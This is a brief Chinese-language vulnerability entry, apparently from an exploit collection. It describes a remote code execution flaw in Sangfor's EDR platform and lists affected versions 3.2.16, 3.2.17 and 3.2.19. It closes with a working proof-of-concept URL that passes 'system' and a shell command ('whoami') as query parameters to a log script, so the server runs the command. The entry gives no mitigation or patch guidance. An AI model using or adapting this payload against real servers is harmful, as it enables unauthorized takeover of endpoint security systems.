漏洞描述深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞,可向目标服务器发送恶意构造的HTTP请求,从而获得目标服务器的权限,实现远程代码控制执行。
EDR v3.2.16 EDR v3.2.17 EDR v3.2.19
https://xxx.xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&limit=whoami